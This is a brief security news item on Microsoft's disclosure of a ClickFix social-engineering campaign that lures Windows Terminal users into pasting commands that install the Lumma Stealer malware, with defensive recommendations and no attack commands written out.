Microsoft Exposes ClickFix Terminal Attack Chain
Microsoft disclosed on March 6 a sophisticated social engineering campaign that weaponizes the Windows Terminal application to distribute Lumma Stealer malware. The attack, designated as ClickFix, was actively observed throughout February 2026.
Unlike previous campaigns that relied on the Windows Run dialog, this variant specifically targets the terminal emulator program. Attackers trick users into executing malicious commands directly through the Windows Terminal interface.
Windows Terminal Users at Risk
The campaign affects Windows systems running the Windows Terminal application. All versions of Windows 10 and Windows 11 with the terminal emulator installed are potentially vulnerable to this social engineering technique.
Organizations and individual users who regularly use command-line interfaces face elevated risk. The attack doesn't exploit a software vulnerability but relies on user interaction to succeed.
Related: PhantomRaven Campaign Hits npm with 88 Malicious Packages
Related: Teams Phishing Campaign Deploys A0Backdoor Malware
Related: Security Executive Hit by Multi-Vector Phishing Campaign
Related: PayPal Amazon Phishing Campaign Targets Customer Support
Related: ClickFix Malware Campaign Targets AI Coding Assistants
ClickFix Attack Mechanics and Response
The ClickFix campaign instructs victims to open Windows Terminal and paste malicious commands that download and execute Lumma Stealer. This information-stealing malware targets credentials, cryptocurrency wallets, and browser data.
Microsoft recommends user education and endpoint protection to counter these attacks. Organizations should implement application control policies and monitor terminal usage for suspicious command execution patterns. The Microsoft Security Response Center continues tracking this threat activity.
